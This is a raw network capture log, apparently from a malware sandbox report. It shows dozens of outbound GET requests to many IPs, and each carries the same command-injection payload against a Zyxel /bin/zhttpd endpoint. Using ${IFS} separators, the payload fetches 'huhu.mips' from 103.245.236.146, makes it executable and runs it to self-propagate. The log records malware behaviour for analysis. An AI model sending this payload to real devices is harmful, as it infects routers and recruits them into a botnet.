                                      Jan 19, 2024 17:29:46.050223112 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7722192.168.2.1442094208.202.225.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050265074 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7723192.168.2.14436702.80.255.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050286055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7724192.168.2.1438222131.4.161.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050343990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7725192.168.2.1453342111.8.236.44443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050394058 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7726192.168.2.1435156217.144.17.24443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050435066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7727192.168.2.1460232200.176.197.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050452948 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7728192.168.2.1445848223.193.100.70443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050503969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7729192.168.2.145533834.83.101.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050528049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7730192.168.2.1456476209.86.14.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050592899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7731192.168.2.143356623.136.203.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050621033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7732192.168.2.1438704171.253.101.147443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050641060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7733192.168.2.1437612119.34.57.0443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050693989 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7734192.168.2.1452214158.137.65.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050754070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7735192.168.2.1456614157.250.231.52443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050776005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7736192.168.2.1452474200.195.136.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050832033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7737192.168.2.144735496.146.78.65443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050858021 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7738192.168.2.1443530201.178.113.51443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050900936 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7739192.168.2.1443004184.209.208.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050961018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7740192.168.2.143957686.235.126.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.050977945 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7741192.168.2.1444630217.125.198.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051008940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7742192.168.2.145058431.155.122.122443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051062107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7743192.168.2.144807874.187.231.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051115036 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7744192.168.2.145936234.197.108.36443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051153898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7745192.168.2.1435770132.212.218.84443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051170111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7746192.168.2.1433440222.250.45.87443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051214933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7747192.168.2.145725494.185.205.216443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051273108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7748192.168.2.1457274172.116.46.202443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051289082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7749192.168.2.143706862.172.88.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051331997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7750192.168.2.1449458180.118.186.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051347971 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7751192.168.2.1451866188.255.129.137443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051409006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7752192.168.2.144212872.252.145.198443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051434994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7753192.168.2.1437928221.112.97.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051484108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7754192.168.2.1437336145.226.22.141443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051527023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7755192.168.2.1450582223.168.190.6443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051578045 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7756192.168.2.1437688199.113.9.64443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051652908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7757192.168.2.144999261.77.116.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051681042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7758192.168.2.1432824108.92.172.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051765919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7759192.168.2.1457616212.87.160.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051786900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7760192.168.2.1456540219.130.87.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051860094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7761192.168.2.1438190174.235.207.219443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051899910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7762192.168.2.1456602167.122.155.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051914930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7763192.168.2.1448048122.9.82.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051949978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7764192.168.2.1451634129.159.187.139443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.051980972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7765192.168.2.145049454.126.223.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052020073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7766192.168.2.144943849.34.222.164443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052064896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7767192.168.2.1444372182.25.103.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052114964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7768192.168.2.1437138126.65.250.10443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052141905 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7769192.168.2.1437318105.242.83.110443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052174091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7770192.168.2.1442942101.23.40.26443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052226067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7771192.168.2.146046876.245.51.30443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052246094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7772192.168.2.1453934101.147.68.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052298069 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7773192.168.2.1438196201.115.59.128443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052325964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7774192.168.2.143738492.2.195.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052377939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7775192.168.2.143516692.109.181.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052428961 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7776192.168.2.144497666.211.85.218443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052474022 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7777192.168.2.1443520156.62.164.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052495956 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7778192.168.2.145213078.86.156.92443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052555084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7779192.168.2.1434480161.221.173.254443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052583933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7780192.168.2.1434234186.204.231.50443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052619934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7781192.168.2.1458454119.198.203.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052680969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7782192.168.2.1440864140.163.193.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052715063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7783192.168.2.144399867.214.87.1443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052759886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7784192.168.2.1446198219.135.41.140443
                                      TimestampBytes transferredDirectionData
                                      Jan 19, 2024 17:29:46.052803040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      7785192.168.2.1449736118.93.132.23443
                                      TimestampBytes transferredDirectionData
